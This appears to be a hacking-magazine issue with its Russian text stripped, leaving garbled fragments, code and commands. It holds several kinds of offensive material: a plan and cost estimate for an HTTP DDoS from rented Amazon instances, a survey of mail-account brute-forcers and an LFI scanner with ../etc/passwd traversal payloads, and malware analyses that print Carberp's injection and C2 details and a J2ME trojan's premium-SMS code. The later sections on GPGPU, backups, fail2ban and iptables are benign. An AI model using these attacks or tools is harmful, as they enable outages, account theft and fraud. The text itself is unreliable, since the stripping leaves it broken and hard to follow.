Defcon 18 (bit.ly/lid5Sr).
Application Flood HTTP, , ,
(
- Defcon) ,
.

Application Flood,
. SlowPost.pl
Application Flood. , -

Instance

$0,085 ~ 3 /

(in+out) ()

<1

<$0,150 ~ <4

<7 /


Rainbow tables
900
- .
, - Apache.
MaxClients 256: -
256
. - IIS (Windows 2003 Server),
Apache, , 20 000.

IaaS Amazon (aws.amazon.com).
. -, Amazon ,

. -,

, 3, ,
Amazon .
Instance, , :
x86/x64 (1 CPU);
613 ;
10 HDD.
Instance , ,
. Instance
100 Mb/s,

.
.
,

HTTP-.
, 1 Instance + SlowPost.pl
900 -.
, ,
-, 900. ,

, .
- 7 ! (.
4)
, IIS.
IP-. ,
, 20 000
IP-. -
. ,

46 Instance, 900 . , Amazon 20
Instance. , DDoS-, . ,
-. ,
300 .
- (Prepaid Card For
Internet Shopping) $5 Amazon . ,

AMI

HTTP DoS -


900

Instance

46

$0,085 * 46 * 2 = ~ 240

(in+out) ()

<2
:

<$0,150 ~ <8
1150

- 1150 .
5.
-
,
-.

Instance


-.
,
, ,
. ,
. ,
, , : ,
, ,
, .
, .
:
AMI
;
( , ..);

,
HTTP-GET- ,
.
, .
1000 ! , .

, .

Abuse-

,
.


. ,
, (, Amazon), abuse
. ,
. -,
, , IP- , .
,
.
:
, , , .

,
:
IP- ;
IP- ;
, ;
, ;
, (
4 );
.

. , IP-
,
.
-

.

,
,
. . ,
,
. z


(icq 884888, snipper.ru)


blackhat

X-TOOLS
: Witchxtool
: *nix/win
: th3_w1tch

: MRBrute
: Windows 2000/XP/2003 Server/
Vista/2008 Server/7
: [i]Pro, Dark-web.ws

!
,
Makassar Ethical
Hacker .
,
LFI.
,
LFI (Local File
Include). :
Target : http://site.com/index.php?page=
# LFI,
:
../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
..


MD5, SQL,
proxylist.net ..

, .
Data::Validate::IP:
cd modules
cd-Net-RawIP 00:25
perl Makefile.PL
make && make install


Mail.Ru

Mail.Ru.

:

(
);
Delimiter Source:
<Login>:<Password>;
Type Proxy .


.
:
, .
Generate
Source.txt.

:
HTTP Proxy
.

: MGrab
: Windows 2000/XP/2003 Server/
Vista/2008 Server/7
: Boolean

( 150
);
(HTTP/SOCKS4/5);
;

(
,
);
;
.NET Framework.



:
Bad ;
Good Good ()
;
Source ,
email@mail.ru:
password;
Proxy
;
Threads ;
TimeOut

Mail.Ru
Mail.Ru.
-,

MRBrute.
otvet.mail.ru, . :
;
;

;
;
;

For Grab (:
friends, auto, business, countries,
magic, relax, food ..).


,
.

: Reallogger
: Windows 2000/XP/2003 Server/
Vista/2008 Server/7
: Van32

TDS Killer ,

(TDS). : Simple TDS Advanced TDS.
:
my $thr = 20; # -
my $tds_type = 0;
# 0 Simple TDS; 1 Advanced TDS

good.txt,
.
bit.ly/iiv2S3.
.

: ICQ Multiregger
: Windows 2000/XP/2003 Server/
Vista/2008 Server/7
: Zdez Bil Ya

tds.txt
TDS, login.txt pass.txt
.
.
,
.
:
Simple TDS inurl:go.php?sid=
Advanced TDS out.php?s_id=


Reallogger fuckav.ru Van32.
,

.
: ,
FTP- php- POST-.
:

tds_checker.pl,
.
bit.ly/mwL4hO.

: Rambler Regger
: Windows 2000/XP/2003 Server/
Vista/2008 Server/7
: Zdez Bil Ya

HKCU\Software\Microsoft\Windows\CurrentVersion\Run :AntVir
c:\documents and settings\admin\local settings\application data\antvir.exe


FuckAV: bit.ly/jIClsC.

:TDS Killer
: *nix/win
: daniel_1024


Rambler

TDS

Zdez Bil Ya.


email
Rambler.ru. ( socks),

Antigate. , -


Zdez Bil Ya icq.com,


, , . ,
email- (
Rambler Regger).

,

, . :
;
;
;
;
: email;
( );

good.txt;
: mail.ru (bk.ru, inbox.ru, list.ru), yandex.ru, rambler.ru;

, POP-
pop.site.domain.

,
:). : bit.ly/k8yQzt. z


MALWARE
, Malware Analyst Group-IB (Slim_d0g@mail.ru)
, Malware Analyst Group-IB (iRe9ent@gmail.com)

Win32/TrojanDownloader.Carberp

GENERATION
CARBERP


Win32/TrojanDownloader.Carberp
Win32/Carberp , 2010
, , .


. Zeus
SpyEye.
.
?

, , VirusTotal.com,
,
.


BinDiff IDA, ,
.
HIEW, . -, PE-. -, .text
, , ,

GMER - -
(kernel32.dll advapi32.dll),
(EqualPrefixSid),
. . , . .reloc
, .
.
, ,
,
, (.
1).
.

-
.
, . ,
.

,
, Windows (ntdll.dll, kernel32.dll ws2_32.dll). ,
.
, ,
10 ,
. , -
, 10 , .
, Carberp \ API Monitor
:).
API- .
, ,
. , -

, TaskManager

,

, ,
OllyDbg IDA,
.
,
,
.


-
.
, explorer.exe.
.

ESET

Win32/TrojanDownloader.Carberp.W      641C4FF3047077231A92931D75C20017
Win32/TrojanDownloader.Carberp.X      D9D92134F12469A68FCA24F49F1CC608
a variant of Win32/Kryptik.LKI ( )    74995A8F06E1268A43E1CF26A36DFF84

1.

Win32/TrojanDownloader.
Carberp.W
trojan

Win32/TrojanDownloader.
Carberp.X trojan

Win32/TrojanDownloader.Carberp.X
trojan


Section


"Section"

QueueAPCThread()

API

2. ,
, CreateProcess
CREATE_SUSPENDED, , explorer.exe. ZwCreateSection (SectionObject ,
) (, , ).
ZwMapViewOfSection
memcpy
. ,
explorer.exe,
. ,
explorer.
ReadProcessMemory explorer.exe ,
,
. ,
,
memcpy explorer
.
,
. , explorer
, .
explorer.
ZwResumeThread, ,
.
, Carberp , payload
. ,
API-.
Carberp explorer.exe.


,
, .
ZwQueueApcThread,
explorer ,
. ZwResumeThread
.

,
, . ,
, Carberp ,

%HOMEDRIVE%\%HOMEPATH%\StartMenu\Programs\StartUp\.
, ! ,
.
explorer.exe, -

explorer.exe, 1


, explorer.
PID-. ,
. FindWindow ("Shell_TrayWnd", 0) GetWindowThreadProcessId (hWnd, &id),
, id PID.
- id=0,
.
PID ,
explorer ZwOpenProcess +
WriteProcessMemory.
NtQueryDirectoryFile NtResumeThread
ntdll.dll. (, RootkitUnhooker),
. , KiFastSystemCall (. ).
? NtQueryDirectoryFile
, . ( explorer cmd)
.
, . NtResumeThread
explorer (!)
. , explorer , PID
,
. ,
, explorer, .
,
Carberp. ,
, 2.

,
. ,

, IBank
Zeus
.
,
,
,
cab-
.


. .

1 :
1. 1.
2. GET-, :
uptime;
downlink;
uplink;
id ( ,
);
statpass ( );
comment.
:
/stat?uptime=<val1>&downlink=<val2>&uplink=<val3>&id=<val4>&statpass=<val5>&comment=<val6>
3. .
2 :

explorer.exe, 2

explorer.exe, 3


explorer.exe

IDE

1. .
:
ok;
badpass;
session: < >.
3 :
1. :
ok ;
badpass, session
.


1 :
1. POST- 2, :
, ;
,
.
:
1|palladin|05B45905A93F7D4B843D385AAE079AF1|0|0
:
a=e15e327af46a915c1b0014a284c052787ea7d63c8c40b1
a3dcafea6bb8e7076b0f6601861783dff7cbca429eb76a47
.
2. .cab-
2.
3.
. ,
, :
0|check|00000000000000000000000000000000|
2 :
1. .
.
2. . (.
3).
3 :
1. (. 4).
, Carberp :

update

update

dexec

download

killbot

killuser

startsb

loaddll
grabber

3. , ,


.text
, , , .
,
.
,
. , .
, , ,
-.


, .
miniav.plug, killav.plug
passw.plug ( ,
Carberp ).
python, , . ,
miniav.plug
Carberpa , , Zeus,
. killav.plug
, passw.plug
.

, ,
, , .

. ,
.
Carberp. z

update

update

PE-

dexec

download

PE-

killbot

killuser

startsb

loaddll

grabber

4.

MALWARE

. 1.

Sjboy

. 2.

J2ME

Sjboy

J2ME-


. ,
,
.
,
.
, Java 2 Micro Edition (J2ME).
,
( , :)).
. ,
Sjboy.

(. . 1).
.
. ,
. (,
):
,
. ,
c ,
.

.

, . ,
(, - ):
aa popaa aao coaa pecpa,
oopa opa a ocy aoy apoy apxy


poecx apyo, oope ocy a c 18 e


oee. Cay popay B aaee ecao, oaa
pocxo oo a pa o apy aeo oepaopa, a
a opaeoe cooee ae, Bae cooc cc
cooe opay oopx apoc poee cocoe:
a oep 5370 ~10.31$ (15 ), 5373 ~4.57$ (7 ),
7250 ~3.64$ (3 ) .e ec: caa ecao a cae
acaec oo aa poe, a a cooe oopoe
ocae poee, ae. poee apoc
opay sms!!! o apecppoac apo
poeco apxe, B aaee a. ocaoo aa
o pa, aee 2 paa cy co cea, a a 2 sms, ec
aee 3 paa, o cyy cy 3 paa cooeceo. 3 , !

? ,
?! , , ,
. .
,
, .
,
,
. .

, . JAR.
ZIP, . , .
J2ME- midlet.class.
.class Java.
, C/C++: .c/.cpp .obj. Java class , ,
JAD. . , ,
midlet.class, class,
.
, sendNextSms. ,
, . ,
, . ,
. midlet.class
:
if (e_boolean_fld)
{
    e_boolean_fld = false;
    sendNextSms();
}
, , e_boolean_fld true. :
if(i == b.b && mode > 4 && mode < 6)
{
    e.a(e.f, e.g);
    if(b.e > 1)
    {
        while(b.a_int_array2d_static_fld[rX][rY] == 0)
        {
            nextX();
            nextY();
        }
        b.a_int_array2d_static_fld[rX][rY] = 0;
        b.e--;
        c_int_fld = 100 - b.f * b.e;
        if(c_int_fld > d_int_fld)
        {
            e_boolean_fld = true;
            d_int_fld = d_int_fld + 11;
        }
        nextY();
        return;
    } else {
        a_b_fld.a(d.a, null);
        a_b_fld.b("!");
        a_b_fld.a(e_java_lang_String_fld);
        e.a(e.g, 0);
        a_b_fld.serviceRepaints();
        a_long_fld = System.currentTimeMillis();
        mode = 6;
        c_boolean_fld = true;
        return;
    }
}

, , ,
.


. , b.e . , :
a_b_fld.b(!);. ,
: b.e--;, . ,
e_boolean_fld, SMS,
: c_int_fld > d_int_fld.
, b.e , c_int_fld, , : c_int_fld = 100 - b.f
* b.e.
sendNextSMS
():
String s1 = b_java_lang_String_fld;
String s = c_java_lang_String_fld;
c c1 = a_c_fld;
System.gc();
if(c1.a_java_lang_Thread_fld == null)
{
    c1.a_boolean_fld = false;
    c1.a_java_lang_String_fld = s1;
    c1.b = "sms://" + s;
    c1.a_java_lang_Thread_fld = new Thread(c1);
    c1.a_java_lang_Thread_fld.start();
}
try
{
    Thread.sleep(300L);
}
catch(Exception _ex) { }

c1. ,
s , SMS, s1 . , , ,
c1. :
MessageConnection messageconnection;
System.gc();
messageconnection = null;
TextMessage textmessage;
(textmessage = (TextMessage)(messageconnection = (MessageConnection)Connector.open(b)).newMessage("text")).setAddress(b);
textmessage.setPayloadText(a_java_lang_String_fld);
messageconnection.send(textmessage);

, , .
. ,
a_java_lang_String_fld: textmessage.setPayloadText(a_java_lang_String_fld);. , b:
(textmessage = (TextMessage)(messageconnection = (MessageConnection)Connector.open(b)).newMessage("text")).setAddress(b);. -
: messageconnection.send(textmessage);.

. ,
. ,
: -,
. , ,
. z



Mifrill (mifrill@real.xakep.ru)

HD MOORE
Metasploit

(HD Moore)
.
2000- - HITB
, :
. , , ,
!.
22 .

1981
-
. , HD
Moore, . ,
( H,
), D,
.
,
.

IT-, ,
.


. .
( ).
(
) ,

. ,

.
,

, ,
. ,
, 17
,
SHADOW
(Secondary Heuristic Analysis for Defensive


Online Warfare).
,

.
,
.

Yahoo.
white hat
Yahoo
,

.
.
,
,
Computer Sciences
Corporation
. ,

, , ,
,

.

,
. , , ,
( ) Metasploit.
, , , , , ,
HITB, :). ,

,
.

Metasploit 2003
,
.
,
, Metasploit
Framework . ,
.
,
.
,

.
(http://digitaloffense.net) Metasploit Framework : Metasploit -,

,
,

Metasploit .
Metasploit ,
- . , ,
- , -
Linux . SOURCE .
Perl


curses. ,
2006 ,
, Metasploit LLC,

.
BreakingPoint,
. BreakingPoint



,

Ruby ( , Python C).
, LEGO ,
,
.

Metasploit

,
Metasploit, 2005

,
, ,

. ,
. 4


, ,
BreakingPoint .

, ,
. ,
,
,
. , , :

,
iDefense?. Metasploit, ,

, , .
,
,

, -,

Metasploit .
,
, , (
),
- . ,
,


Metasploit
, , ,
. , ,

, CERT.
2009 ,
Metasploit Rapid7,
. ,
BreakingPoint, Rapid7 ,
.

, .
Metasploit Framework - ,
Metasploit Express,
$3000 , Metasploit Pro,
. , ,
2008 , Metasploit Framework
BSD.
,
, open-source.

,
. Metasploit ,
.
Rapid7, ,
9
.
, Metasploit. , ,
. ,
,
. , 2000-,
$5 000
PayPal- .
,
, ,
, .

2010 Rapid7 SANS


Metasploit Framework. :
, . , , - .
,
:).
, 2006
,
, , , AxMan.
ActiveX .

, .

Metasploit Framework -
,
Metasploit Express,
$3000


WarVOX,
, war-dialing. ,
-, , , .
8 10 000
. WarVOX .
- , WarVOX
. ,
, , ,
, . z

UNIXOID
(execbit.ru)

GPU

. ,
CUDA, Stream OpenCL, -
. ,
, , . , ,
.

,
GPGPU (General-purpose graphics processing units, ) . ,
,
, ,

, , ,
.


GPGPU

, ,
, , .
,
, ,
.

, .
, (

()

AES OpenCL

KGPU Linux, GPU



KGPU (code.google.com/p/kgpu/),
Linux

CUDA.
Linux ,
,

CUDA. ,
,
, KGPU
AES,
eCryptfs 6 .

)
, .
,
.
x86-,
( ) , , SSE, , .. ..
,
, ,

, (
BrookGPU,
DirectX OpenGL).
,
,
,

GPU ( nVidia ).
nVidia CUDA, ,
GPU - .
ATi (AMD)
Close to Metal ( Stream),


Apple, OpenCL.

INFO

GPU ?

, GPGPU .
. GPU
(
,
),
.
GPU ,
. GPU
, ,
. GPU
. -
( ),
,
. GPU
,
,
, (, , ,
, ,
, ).
GPGPU ,
GPU .

,
. , , .
,
.
: ,
,
GPU :
GRAM . ,

info

GPGPU
.
OpenCL
SDK, Intel,


CPU.
FASTRA II
,
13 ,
12TFLOPS: fastra2.ua.ac.be.

HTTP://WWW
links
bzip2-cuda.github.com
bzip2

CUDA.
www.hoopoe-cloud.com
,


CUDA OpenCL.


nVidia CUDA
GPGPU
clinfo ,
Stream-
( FlacCL,
).
.
OpenCL,
GPGPU. CUDA,
(, OpenCL
nVidia CUDA),
.

, , GPGPU -
, , ,
( ). ,
. , , FlacCL,
FLAC. GPGPU
,
ImageMagick,
OpenCL. CUDA/OpenCL ( ATi) .
,
, , .
-, , CUDA Stream. , ,
, 2009.
:
en.wikipedia.org/wiki/CUDA en.wikipedia.org/wiki/AMD_Stream_Processor.
, ,
,
.
-, ,
GPGPU, OpenCL.
-, GPGPU,
,
SDK : CUDA Toolkit (goo.gl/lbdxm) ATI Stream SDK
(goo.gl/YS2K). .

CUDA Toolkit

CUDA Toolkit Linux


( , Fedora,
RHEL, Ubuntu SUSE, x86,


x86_64). , (Developer Drivers for Linux, ).


SDK:
$ sudo sh cudatoolkit_4.0.17_linux_64_ubuntu10.10.run

, .
X-:
# sudo /etc/init.d/gdm stop

<Ctrl+Alt+F5> :
$ sudo sh devdriver_4.0_linux_64_270.41.19.run

:
$ startx

CUDA/OpenCL,
CUDA- LD_LIBRARY_PATH:
$ export LD_LIBRARY_PATH=/usr/local/cuda/lib64

, 32- :
$ export LD_LIBRARY_PATH=/usr/local/cuda/lib32

CUDA,
:
$ export C_INCLUDE_PATH=/usr/local/cuda/include

, CUDA/OpenCL-.

ATI Stream SDK

Stream SDK , AMD (


/opt) LD_LIBRARY_PATH:
$ wget http://goo.gl/CNCNo
$ sudo tar -xzf ~/AMD-APP-SDK-v2.4-lnx64.tgz -C /opt
$ export \
LD_LIBRARY_PATH=/opt/AMD-APP-SDK-v2.4-lnx64/lib/x86_64/
$ export C_INCLUDE_PATH=/opt/AMD-APP-SDK-v2.4-lnx64/include/

CUDA Toolkit, x86_64 x86


32- . icd-registration.tgz (
):


OpenCL nVidia
CUDA Toolkit
$ sudo tar -xzf \
/opt/AMD-APP-SDK-v2.4-lnx64/icd-registration.tgz -C /

/ clinfo:
$ /opt/AMD-APP-SDK-v2.4-lnx64/bin/x86_64/clinfo

ImageMagick OpenCL

OpenCL ImageMagick ,
.
IM .
, SDK,
-
nVidia AMD. , / :
$ wget http://goo.gl/F6VYV
$ tar -xjf ImageMagick-6.7.0-0.tar.bz2
$ cd ImageMagick-6.7.0-0

:
$ sudo apt-get install build-essential


OpenCL:
$ LDFLAGS=-L$LD_LIBRARY_PATH ./configure | \
grep -e cl.h -e OpenCL


:
checking CL/cl.h usability... yes
checking CL/cl.h presence... yes
checking for CL/cl.h... yes
checking OpenCL/cl.h usability... no
checking OpenCL/cl.h presence... no
checking for OpenCL/cl.h... no
checking for OpenCL library... -lOpenCL

yes ,
( ). , , ,
C_INCLUDE_PATH.

FlacCL flac
no , , LD_LIBRARY_PATH. , /
:
$ sudo make install clean

, ImageMagick OpenCL:
$ /usr/local/bin/convert -version | grep Features
Features: OpenMP OpenCL

.
ImageMagick convolve:
$ time /usr/bin/convert image.jpg -convolve \
'-1, -1, -1, -1, 9, -1, -1, -1, -1' image2.jpg
$ time /usr/local/bin/convert image.jpg -convolve \
'-1, -1, -1, -1, 9, -1, -1, -1, -1' image2.jpg

, , , , ImageMagick
, .
OpenCL.

FlacCL (Flacuda)

FlacCL (www.cuetools.net/doku.php/flacuda)
FLAC,
OpenCL. CUETools (www.cuetools.net/doku.php)
Windows, mono Linux.
:
$ mkdir flaccl && cd flaccl
$ wget www.cuetools.net/install/flaccl03.rar

unrar, mono :
$ sudo apt-get install unrar mono
$ unrar x flaccl03.rar

OpenCL, :
$ ln -s $LD_LIBRARY_PATH/libOpenCL.so libopencl.so


UNIXOID

GPU x86-
:
$ mono CUETools.FLACCL.cmd.exe music.wav

Error: Requested
compile size is bigger than the required workgroup size of 32, ,
,
--group-size XX, XX .
, - OpenCL
. FlacCL ,
.

oclHashcat

, GPGPU
. ,
GPU-. ,
.
oclHashcat.
oclHashcat (hashcat.net/oclhashcat/) ,
,
GPU OpenCL.
, , MD5 nVidia GTX580 15800 , oclHashcat
- 9 .
OpenCL CUDA, MD5,
md5($pass.$salt), md5(md5($pass)), vBulletin < v3.8.5, SHA1,
sha1($pass.$salt), MySQL, MD4, NTLM, Domain Cached Credentials,
SHA256, .


(, -, ), Linux-, : hashcat.net/files/oclHashcat-0.25.7z.
:
$ 7z x oclHashcat-0.25.7z
$ cd oclHashcat-0.25

(
):
$ ./oclHashcat64.bin example.hash ?l?l?l?l \
example.dict

oclHashcat ,
, YES.
, <s>.
, <p>, <r>.
(, aaaaaaaa
zzzzzzzz):
$ ./oclHashcat64.bin hash.txt ?l?l?l?l \
?l?l?l?l

, ( docs/examples.txt).
11 ,
( aaaaaaaa zzzzzzzz) 40 . GPU ( RV710) 88,3 /.

, GPGPU
. , Windows-,
Linux. z

UNIXOID
(execbit.ru)

1000


Linux. - : , ,
. . , .

?
:
1. ? !.
, ,
. , .
2. , .
, , , ,
, .
, , - .
.
? : .
, - , (
, ).
. ,
,

.

- ,
,
. ,
:


// , config.cfg,

$ cp config.cfg config.cfg.bak
// ,
$ vim config.cfg
// , ,
$ mv config.cfg.bak config.cfg

, . . ,

- .
.
,
, . , .
:
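vim() {
    FILE=$1
    DATE=`date +'%F'`
    BAK=.$FILE.bak
    # Dated copy of the file, plus a symlink pointing at the latest copy
    cp "$FILE" "$BAK-$DATE"
    rm -f "$BAK"
    ln -s "$BAK-$DATE" "$BAK"
    # "command" runs the real vim instead of recursing into this function
    command vim "$FILE"
}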

btrfs

,

INFO

info
FreeBSD

Inotify kqueue,
,

, .

,
.
.

btrfs

mv .$1.bak $1
}

~/.bashrc, vim,

( ), ret,
.
,
,
.


, Inotify. Linux, ,
,

inotifywait.
Inotifywait ( inotify-tools)
, ,
,
, . :
, , .
inotifywait ,
,
, ,
:
$ vi ~/bin/in-back.sh
#!/bin/sh
DIR=`pwd`

WARNING
warning

fsniper

torrent-.
Torrent-


,

.

HTTP://WWW
links
distanz.ch/inotail/
tail, Inotify.


$ vi ~/bin/in-back2.sh
#!/bin/sh
DIR=`pwd`
inotifywait -mr --timefmt '%d-%m-%y %H-%M' \
    --format '%T %f' -e close_write "$DIR" | \
while read DATE TIME FILE; do
    cp "$FILE" ".$FILE.bak-$DATE-$TIME"
done

, . '-m' inotifywait
, '--timefmt'
'--format' , , ,
. , , .
:
$ ls -la | grep -e '.*\.bak-\.*'

:
$ rm -rf .*.bak-*

, ,
, incron fsniper,
inotify .

inotifywait /proc
while inotifywait -r -e modify $DIR; do
cp $DIR ~/bak/.$DIR.bak
done;


, . ,
inotifywait ,
.
:

inotifywait , , . incron.
incron, , Inotify-
cron. ,
, . , /,
, ,
. :
$@ /,
$# ,


$% ( )
$& ( )

cron-
incrontab, '-i'
. cron '-e'. , , :
[] [] []

/, ,
, ,
(
).

inotify inotifywait. :
IN_ACCESS (, )
IN_ATTRIB (
)
IN_CLOSE_WRITE File , ,

IN_CLOSE_NOWRITE File , ,
IN_CREATE
IN_DELETE
IN_DELETE_SELF
IN_MODIFY
IN_MOVE_SELF /
IN_MOVED_FROM

IN_MOVED_TO
IN_OPEN

, ,
/etc/incron.allow /etc/incron.deny, .
,
.
incrond .
, . ,
, .
, incrond /etc. :
$ export EDITOR=vim
$ sudo incrontab -e

:
/etc IN_CLOSE_WRITE /bin/cp $@/$# $@/.$#.bak-`/bin/date +'%F'`

,

, , .

inotify- fsniper
(freshmeat.net/projects/fsniper).
, .
fsniper . incron ,
,
,


.
, , , , (,
). , ~/images, ~/video, ~/music .. , fsniper
, .
, .
,
. , ,
fsniper:
$ sudo apt-get install fsniper

:
$ mkdir ~/.config/fsniper

config :
$ vi ~/.config/fsniper/config
watch {
#
~/downloads {
image/* {
handler = cp %% ~/images
}
video/* {
handler = cp %% ~/video
}
audio/* {
handler = cp %% ~/music
}
}
}

, ,
. ,
mime-,
(, *.avi)
(.*HDRip.*).
fsniper
:
$ fsniper --daemon

, , , incron, fsniper
,
. Gnome KDE
,
~/.xsession:
$ vi ~/.xsession
fsniper --daemon &

, hand made-
, ,
Linux
. ,
.
, , -, .


SSH- rsync
wayback (wayback.
sourceforge.net). ,
, ,
. wayback,
:
$ sudo apt-get install wayback

mount.
wayback:
$ mount.wayback // //

,
,
.
vstat:
$ vstat

vrevert:
$ vrevert -d 12:00:00

, 12 .


, , :
$ vrevert -d 2011:01:01:0:00:00

, , , vstat:
$ vrevert -n 5

,
, vrm:
$ vrm

, . , ?


.

.
,

.
,

first_snapshot
second_snapshot

btrfs copy-onwrite ( ), ,
.
.

wayback

.
ext3 ext4 ( ), btrfs, ,
Linux- ( 2.6.29-rc).
,
, .
btrfs , btrfsprogs ( btrfs-progs-unstable).
:

,
.
,
. ,
- .


rsync. /
, .
, ,

, , , .
rsync ,
,
.
.
rsync SSH.
:

$ sudo apt-get install btrfs-progs

,
:
$ sudo mkfs.btrfs /dev/sdXX
$ sudo mount /dev/sdXX /mnt

,
:
$ sudo btrfsctl -s first_snapshot /mnt

- :
$ sudo btrfsctl -s second_snapshot /mnt

,
.
,
,
subvol=_:
$ sudo umount /mnt
$ sudo mount -o subvol=first_snapshot /dev/sdXX /mnt


subvol=., :
$ sudo umount /mnt
$ sudo mount -o subvol=. /dev/sdXX /mnt
$ ls -1
default

$ sudo apt-get install rsync


$ rsync -a --delete -e ssh /// \
@:///

, .

:
$ vi ~/bin/in-rsync.sh
#!/bin/sh
DIR=`pwd`
#
USER="vasya"
HOST="host.com"
REMOTEDIR="/backup"
inotifywait -mr --timefmt '%d-%m-%y %H-%M' \
    --format '%T %f' -e close_write "$DIR" | \
while read DATE TIME FILE; do
    rsync -a --delete -e ssh "${DIR}/${FILE}" \
        "${USER}@${HOST}:${REMOTEDIR}"
done


.
, rsnapshot, .

,
. , ,
. z


UNIXOID
grinder (grinder@tux.in.ua)

iptables
IP-
, .
, , IP . iptables,
.

fail2ban

, ,
,
. ,
Fail2ban (fail2ban.org). : ,
,
. , IP iptables/ipwf
TCP Wrapper (/etc/hosts.allow|deny).
, , ,
. / e-mail. Fail2ban
SSH, ,
,
IP. ,
.
Fail2ban
Linux,
.

.
Ubuntu/Debian :
$ sudo apt-get install fail2ban

, SSH.


,
/etc/fail2ban ( Debian/Ubuntu). fail2ban.conf
,
. 0.7,
.
filter.d action.d.
.conf .local. ,
- ,
.conf .
. .
, . , HOST ,
IP :
(?:::f{4,6}:)?(?P<host>[\w\-.^_]+)

, , DDOS- SSH:
$ grep -v '^#' /etc/fail2ban/filter.d/sshd-ddos.conf
[Definition]
failregex = sshd(?:\[\d+\])?: Did not receive identification string from <HOST>$
ignoreregex =

failregex , . ignoreregex , .
. ,

fail2ban
, .
- fail2ban-regex,
.
, Asterisk
, VoIP ,
:
NOTICE[3309] chan_sip.c: Registration from
'sip:XXX@1.2.3.4' failed for '9.8.7.6' No matching
peer found

:
failregex = NOTICE.* .*: Registration from '.*' failed for '<HOST>' No matching peer found

. :
$ fail2ban-regex /var/log/asterisk.log "NOTICE.* .*: Registration from '.*' failed for '<HOST>' No matching peer found"

,
asterisk.conf, filter.d.
, , . , ,
.
action.d.

DPI
Deep Packet Inspection (
) ,
,
. DPI-
OSI
:
(P2P, VoIP, online-,
, ),
;

(, P2P: BitTorrent, KaZaa,
eDonkey, Gnutella, MP2P, FastTrack);
,
,
(QoS);
(, ,
).


fail2ban

/, , ,
.
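Fail2ban, /etc/fail2ban/jail.conf.
.
$ sudo nano /etc/fail2ban/jail.conf
[DEFAULT]
# IP addresses, networks or DNS names that are never banned
ignoreip = 127.0.0.1
# Ban duration, in seconds
bantime = 600
# A host is banned after maxretry failures within findtime seconds
maxretry = 3
findtime = 600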

HTTP://WWW
links
Fail2ban
fail2ban.org.
OpenDPI
opendpi.org, code.
google.com/p/opendpi.
Xtables-addons
xtables-addons.
sf.net.

[asterisk-iptables]
enabled = true
# Filter (filter.d/asterisk.conf) and actions (action.d/) used by this jail
filter = asterisk
action = iptables-allports[name=ASTERISK, protocol=all]
         sendmail-whois[name=ASTERISK, dest=root, sender=fail2ban@example.org]
# Asterisk log file
logpath = /var/log/asterisk/messages
# Per-jail overrides of the [DEFAULT] values
maxretry = 5
bantime = 6000

, :
$ sudo service iptables start
$ sudo service fail2ban start

Fail2ban , /var/
log/fail2ban.log iptables.


fail2ban iptables

$ sudo iptables -L -v | grep fail2ban

Xtables-addons
patch-o-matic (-ng),
iptables, ,
Xtables-addons (xtables-addons.sf.net).
/ iptables.
,
. ,
CONFIG_NETFILTER_XTABLES :
$ grep -i xtables /boot/config-`uname -r`
CONFIG_NETFILTER_XTABLES=m

, . Ubuntu :
$ sudo apt-cache search xtables-addons

... : ,
.
$ sudo apt-get build-dep xtables-addons-common

, ,
, : ./configure; make; make install.
:
$ lsmod | grep x_tables

.
20 . , ,
, man xtables-addons. .
IP- , ,
, . GeoIP /
. ,
. , /usr/
libexec/xtables-addons ( /usr/lib/xtables-addons). CSV
Perl:
$ cd /usr/libexec/xtables-addons/
$ sudo ./xt_geoip_dl


penDPI

$ sudo mkdir /usr/share/xt_geoip


$ sudo apt-get install libtext-csv-xs-perl
$ sudo ./xt_geoip_build -D /usr/share/xt_geoip *.csv

,
'--src-cc' (
), '--dst-cc' (). , iptables -m geoip --help.
// Reject all traffic from CN, TW and KR
$ sudo iptables -A INPUT -m geoip \
--src-cc CN,TW,KR -j REJECT
// Reject sources in A1 (anonymous proxies)
$ sudo iptables -A INPUT -m geoip \
--src-cc A1 -j REJECT
// SSH: reject every source country except RU
$ sudo iptables -A INPUT -p tcp --dport 22 \
-m geoip ! --src-cc RU -j REJECT
// ICMP: reject outgoing packets to ES
$ sudo iptables -A OUTPUT -p icmp -m geoip \
--dst-cc ES -j REJECT

GeoIP, ,
- :
iptables -A INPUT -p tcp --dport 80 -m geoip \
--src-cc RU -j MARK --set-mark 1

, ,
IP-, .
,
.
TARPIT. : ,
( TCP
).
,
. , . , SSH- , 22. ,
:
$ sudo iptables -A INPUT -p tcp -m tcp \
--dport 22 -j TARPIT

, 22 , .

GeoIP
xtables-addons

$ patch -p0 < ../ipq_protocols.h.diff

:
DELUDE , ,
.
, , TARPIT DELUDE, CHAOS,
DROP ( ), TARPIT, DELUDE REJECT.
,
'--delude'/'--tarpit' /sys/modules/
xt_CHAOS/parameters.
IPP2P ,
, P2P-,
. P2P-, :
$ sudo iptables -A FORWARD -m ipp2p --ipp2p -j DROP

OpenDPI

, ,
. , , ICQ,
. , ,
80. ,
,
. iptables
, L7-filter
IPP2P. , OpenDPI (opendpi.org, code.google.com/p/opendpi).
LGPLv3, OpenDPI
PACE,
Ipoque. , PACE
-.
PACE OpenDPI: P2P, Skype, VoIP, IM,
, ( DPI ).
:

$ export OPENDPI_PATH=$(pwd)

. , (2.6.27-33), OpenDPI
.
. , clck.ru/DWl8 2.6.35 ( LTS
Ubuntu). CONFIG_NF_CONNTRACK_EVENTS CONFIG_NF_CT_NETLINK.
. Ubuntu
.config- /boot. . , opendpi-netfilter-wrapper, , :
$ cd ../wrapper
$ patch -p3 < ../opendpi-netfilter-wrapper-1.1_2.6.35_v3.patch
$ make

,
2.6.33. :
$ sudo make modules_install
$ sudo cp ipt/libxt_opendpi.so /lib/xtables

:
$ sudo modprobe xt_opendpi

, :
$ sudo iptables -m opendpi --help

( ipq_protocols_
osdpi.h) :

$ sudo apt-get install make gcc libpcap-dev

opendpi-1.2.0.tar.gz opendpi-netfilter-wrapper-1.1.tar.gz,
, :
$ tar -xzf opendpi-netfilter-wrapper-1.1.tar.gz
$ cd opendpi-netfilter-wrapper-1.1
$ tar -xzf ../opendpi-1.2.0.tar.gz
$ cd opendpi-1.2.0
$ patch -p0 < ../ipq_main.h.diff


iptables -A FORWARD -m opendpi --bittorrent -j DROP

, ,
.

,
iptables,
. , , . z


CODING
Spider_NET (http://vr-online.ru)

WEB-

Kohana +
MVC = love

, web, ,
. 2011 , -
.

Content Management Framework.
CMF.
?

Content Management Framework (CMF)


(Content Management
System). CMS, ( )
, .
. CMS
, .

CMF

,
. CMF
:
1. . , .
2. . ,
. ,
, .

,
.
3. .
, CMF ( )
. ,
CMF, .

: , ,


. -



, .
, .
.
